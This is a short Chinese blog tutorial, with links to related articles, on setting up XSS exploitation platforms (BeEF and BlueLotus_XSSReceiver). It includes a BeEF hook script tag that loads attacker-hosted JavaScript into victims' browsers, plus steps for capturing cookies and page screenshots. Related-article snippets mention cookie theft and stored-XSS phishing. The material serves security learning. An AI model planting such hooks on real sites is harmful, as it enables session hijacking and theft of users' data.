xss漏洞之——XSS平台搭建

最新推荐文章于 2024-08-12 04:40:06 发布
最新推荐文章于 2024-08-12 04:40:06 发布
阅读量4.9k 收藏 5
点赞数 5
分类专栏: 渗透测试(web渗透)
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wsnbbz/article/details/104652406
版权

前言
经过测试,如果发现了XSS漏洞,那么我们可以结合一些XSS工具来进行利用。常见的XSS利用工具有下面几个:
1.kali下的beef
(1)kali命令行里输入beef-xss,得到一个脚本
<script src="http://127.0.0.1:3000/hook.js"></script>
将127.0.0.1改为kali的ip,之后进行植入
在这里插入图片描述
(2)kali命令行里输入beef-xss,得到beef管理网址http://127.0.0.1:3000/ui/panel,访问就可以对刚刚植入代码的机器进行攻击
例如获取cookie:
在这里插入图片描述
2.BlueLotus_XSSReceiver搭建的XSS平台
(1)在github搜索BlueLotus_XSSReceiver,下载环境BlueLotus_XSSReceiver-master,放到www目录下,之后安装
(2)安装好之后新建一个js,直接引用模板,此处引用将当前页面生成一张截图的模板screenshot,输入网站路径,点击生成payload
在这里插入图片描述(3)植入代码:
在这里插入图片描述
(4)接收面板里可看到数据回显,返回的内容即为base64编码后的截图
在这里插入图片描述

卖N孩的X火柴
关注
专栏目录
xss测试平台搭建
xdjxi的博客
03-16 5231
1.拉取镜像 docker pull daocloud.io/library/mysql:5.6 2.运行mysql服务,密码为root,端口号为3306 docker run --name mysqlserver -e MYSQL_ROOT_PASSWORD=root -d -i -p 3306:3306 daocloud.io/library/mysql:5.6 3. 搭建xss测试平台,拉取镜像 docker pull daxia/websafe 4. 运行容器 docker run --n..
XSS平台搭建(xsser.me)
热门推荐
fendo
12-27 5万+
一、下载源码 地址: http://download.csdn.net/detail/u011781521/9722570 下载之后解压出来会有这么些文件 把这些文件复制到网站目录xsser中 二、配置环境 步骤:  1、修改config.php里面的数据库连接字段,包括用户名,密码,数
XSS漏洞XSS攻击平台-窃取Cookie
muyuchen110的博客
07-23 417
XSS漏洞基础:XSS 攻击全称跨站脚本攻击,是为不和层叠样式表(Cascading Style Sheets, CSS) 的缩写混淆,故将跨站脚本攻击缩写为 XSSXSS 是⼀种在 web 应⽤中的计算机安全漏洞,它允许恶意web⽤户将代码植⼊到 web ⽹站⾥⾯,供给其它⽤户访问,当⽤户访问到有恶意代码的⽹⻚就会产⽣ xss 攻击;漏洞概念:⽬标未对⽤户从前端功能点输⼊的数据与输出的内容未进⾏处理或者处理不当,从⽽导致恶意的JS代码被执⾏造成窃取⽤户信息劫持WEB⾏为危害的。
xss接收平台推荐-xss平台-xss在线平台
最新发布
vetus1的博客
08-12 903
目录二.XSS在线平台1.访问xss在线数据接收平台:2.创建xss测试项目​编辑3.查看项目对应xss测试代码4.在线功能发送即时代码5.自定义代码的利用6.伪造后台页面测试返回发送明文数据​ 7.延伸搭配自定义代码和发送js搭配模块 自动化钓鱼测试XSS平台-仅用于xss安全测试专用https://d00.cc我们可以看到 有很多返回的信息 包括页面截图 接下来我们测试一下触发效果
搭建HTTPS XSS漏洞利用平台
xxx9686的博客
09-26 705
蓝框域名证书紫框root根证书两张证书则需要合并填入面板证书的右边蓝框中(用文本编辑器完整复制粘贴进去)若不合并只填蓝框域名证书手机访问就会报缺失证书链/不安全等。1、修改config.php里面的数据库连接字段,包括用户名,密码,数据库名,访问URL起始和伪静态的设置。蓝框.crt后缀的是证书(也可能是pem后缀),填入面板证书的右边蓝色框中(用文本编辑器完整复制粘贴进去)以下是文本编辑器里的截图,蓝色域名证书放上面的蓝框中紫框root根证书放下面的紫框中(注意完整)
xss平台搭建
qq_45405155的博客
11-24 2146
update oc_module set code=REPLACE(code,"http://xsser.me","http://127.0.0.1/xss");
xss平台搭建
浅笑996的博客
09-18 6370
1. xss平台搭建 l 将xss平台源码放置在网站目录下 l 进入MySQL管理界面中的phpMyAdmin界面,新建一个XSS平台的数据库 l 修改XSS源码文件目录下的config.php中的数据库连接字段,包括用户名、密码、和数据库名。 l 进入phoMyAdmin选择XSS平台数据库,导入源码包中的xssplatform.sql文件 l 执行如下SQL命令,将数据库中原有URL...
XSS漏洞利用---存储型XSS钓鱼
Ethan024的博客
03-13 1105
XSS漏洞利用(本文仅供技术学习与分享) 存储型XSS漏洞之钓鱼 实验准备 pikachu平台为存在XSS漏洞平台的站点; 用户正常访问该站点; 攻击者搭建的,以供收集数据的后台(皮卡丘后台预备好了pkxss平台); 实验思路(使用basic认证做钓鱼) 制作钓鱼鱼儿:WWW Authenticate:Basic 即:在存在XSS漏洞的页面上嵌入请求(JavaScript或其他链接)。当用户点击打开嵌入恶意代码页面的时候,该页面会向后台发送请求,该请求会要求用户返回basic认证。因此在用户界面就会弹出
xss加载但没反应——CSP简介与绕过
不想当脚本小子的脚本小子
02-08 3102
如果xss加载了但是没反应,可能是有CSP—内容安全策略——可以抓包看看有没有Content-Security-Policy 内容安全策略(CSP),其核心思想十分简单:网站通过发送一个 CSP 头部,明确告诉客户端(制定比较严格的策略和规则),来告诉浏览器什么是被授权执行的与什么是需要被禁止的。即使攻击者发现漏洞,但是它是没办法注入脚本的其被誉为专门为解决XSS攻击而生的神器。 简单来说,就是我们能够规定,我们的网站只接受我们指定的请求资源。 使用 CSP 配置内容安全策略涉及到添加 Co...
网络攻击与防御-第三章 XSS漏洞
yescomecn的博客
10-20 1102
XSS 漏洞 0x01 什么是xss XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java,VBScript,ActiveX,Flash或者甚至是普通的HTML。攻击成功后,攻击者可能得到更高的权限(如执行一些操作)、私密网页内容、会话和cookie等各种内容 https://xz.aliyun.com/t/4507 https://prompt.ml/0 靶
渗透工具开发——XSS平台的命令行实现
HBohan的博客
07-19 566
前言 【网安学习资料】 通过XSS平台,能够便于对XSS漏洞进行测试,获得重要信息。目前,可供使用的在线XSS平台有很多,也可以尝试自己搭建XSS平台。 但是,如果测试目标无法出网,我们就需要在内网搭建一个轻量化的XSS平台,既要安装方便,又要支持跨平台。 我暂时没有找到合适的开源工具,于是打算使用Python编写一个命令行工具,提供XSS平台的功能 简介 【网安学习资料】 本文将要介绍以下内容: ◾设计思路 ◾实现细节 ◾开源代码 设计思路 【网安学习资料】 参照XSS平台,命令行工具需要提供以下功能:.
xss平台搭建源码,xss漏洞练习
06-03
xss平台搭建源码,用于练习xss漏洞,适用于网络安全学科的爱好者和学生,下载后解压缩到www目录下,需要将xss-sql导入数据库,并更改一下源码部分内容,很容易。最后要配置伪静态文件。
xsstry:xss漏洞利用平台
06-10
xsstry xss 漏洞利用平台 xss 漏洞利用平台
web安全xss-lab漏洞靶子常见解决方法
AugenStern的博客
08-24 398
web安全——跨站脚本攻击(xssxssxss攻击xss类型xss-lablevel1level2level3level4level5 xss XSS全称:跨站脚本(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets)的缩写CSS混合,所以改名为XSS。 攻击者会向web页面(input表单、URL、留言版等位置)插入恶意JavaScript代码,导致管理员/用户访问时触发,从而达到攻击者的目的。 xss攻击 绕过XSS-Filter,利用&lt
XSS漏洞XSS平台搭建与打cookie
goldfish8848的博客
06-21 1886
6. **避免内联事件**:避免在HTML中使用内联JavaScript事件处理器,如 `onLoad="onload('{{data}}')"` 或 `onClick="go('{{action}}')"`,因为这些容易受到XSS攻击。7. **避免拼接HTML**:前端采用拼接HTML的方法比较危险,如果可能,使用 `createElement`、`setAttribute` 等方法实现,或者采用成熟的渲染框架,如Vue或React。攻击者可能会尝试使用不同的字符编码或分隔符来绕过简单的输入验证。
Web漏洞-XSS平台简介-相关知识点补充(cookie与session)
ran的博客
03-14 2156
首页(注册)。成功注册后的主页。按照如下路径填写相关信息后点击下一步。之后会返回项目相关的功能。勾选默认模块后点击下一步。点击下一步后,平台会为你创建一个项目。下滑后可以看到平台生成的测试语句。这里我们引用平台生成的最后一条语句。输入网站内的对应位置后点击提交。可以看到成功提交了。来到管理员界面可以看到查看留言的位置。点击进入查看后便发现网站弹出了一个弹窗,说明网站成功执行了js代码。
windows下XSS平台搭建
hhiollk的博客
03-14 2102
在这里我选择用windows2003搭建,之前用linux搭建过,感觉比较浪费时间,所以这次用windows搭建,想看linux搭建的可以点击超链接查看 开始安装 首先下载好源码,Zkeys,ISAPI_Rewrite。这三个我在地下都放出了下载链接 这个是我新装的03,所以要先安装一下iis 用win+R键输入control打开控制面板,依此点开添加或删除程序-添加/删除windo...
XSS————1、XSS测试平台搭建
Fly_鹏程万里
05-13 5841
安装 (1)安装http server与php环境(ubuntu: sudo apt-get install apache2 php5 或 sudo apt-get install apache2 php7.0 libapache2-mod-php7.0) (2)上传所有文件至空间根目录 (3)访问目标网站 根据提示配置xss平台 在配置之前,需要赋予xss的数据存储...
搭建个人XSS平台
风羽墨客的博客
12-19 5698
我们在做XSS靶场练习的时候,可能会使用到XSS平台。我们可以使用XSS平台上的功能,换言之我们的数据也会被平台记录,出于安全性考虑,搭建个人的XSS平台有利于保护自己的数据信息。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值